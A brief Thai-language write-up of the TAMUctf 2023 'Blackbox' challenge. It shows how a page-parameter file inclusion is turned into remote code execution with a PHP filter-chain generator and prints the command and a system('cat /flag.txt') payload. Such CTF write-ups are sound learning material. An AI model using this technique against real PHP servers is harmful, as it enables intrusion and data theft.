TAMUctf 2023- การเขียน Blackbox

May 01 2023
ความท้าทายนี้สร้างโดย Mr. Blade เราจะเห็นว่ามันโหลดหน้าเข้าสู่ระบบด้วยพารามิเตอร์ของหน้า

ความท้าทายนี้สร้างโดย Mr. Blade

เราจะเห็นว่ามันโหลดหน้าเข้าสู่ระบบด้วยพารามิเตอร์ของหน้า

มาแจกแจงไฟล์. ฉันลองใช้ผู้ดูแลระบบก่อนและใช้ตัวเข้ารหัส base64

เมื่อเราถอดรหัสนี้ เราจะได้เส้นทางสำหรับ flag.txt

<center>
<h1><?php include('/flag.txt'); ?></h1>
</center>

ฉันใช้https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
เพื่อรับ RCE

python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

ขอบคุณที่อ่าน.

มีความสุขแฮ็ค!